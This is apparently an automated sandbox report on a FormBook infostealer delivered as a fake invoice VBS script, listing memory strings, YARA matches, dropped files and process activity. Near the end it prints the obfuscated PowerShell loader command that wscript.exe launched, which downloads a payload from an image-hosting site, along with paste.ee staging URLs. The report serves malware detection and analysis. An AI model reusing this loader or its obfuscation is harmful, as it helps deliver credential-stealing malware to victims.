Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: colorcpl.exe, 00000008.00000003.1893364036.0000000006202000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
Source: wscript.exe, 00000000.00000003.1670550299.000001D6672A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1671154482.000001D664BF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000000.00000003.1665768650.000001D667326000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1670550299.000001D6672A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668388101.000001D664CA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1663453819.000001D666A2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665946744.000001D6669D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667628941.000001D666A2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668304258.000001D667264000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1666979969.000001D666A2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1671343503.000001D664CA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672049286.000001D667268000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667597717.000001D667261000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669979049.000001D666A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667808699.000001D664C9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665501762.000001D66730B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/K2No9
Source: wscript.exe, 00000000.00000003.1668304258.000001D667264000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672049286.000001D667268000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667597717.000001D667261000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/K2No95
Source: wscript.exe, 00000000.00000003.1670550299.000001D6672A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/K2No9qSh
Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.gravatar.com
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000003.00000002.1819519654.0000029F03B75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000000.1815748916.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown HTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49733 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\colorcpl.exe Dropped file: C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\colorcpl.exe Dropped file: C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2943761942.000000000B429000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: powershell.exe PID: 6236, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 7004, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 4584, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Sample has a suspicious name (potential lure to open the executable)
Source: Signed Proforma Invoice 3645479_pdf.vbs Static file information: Suspicious name
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9154
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9154 Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDE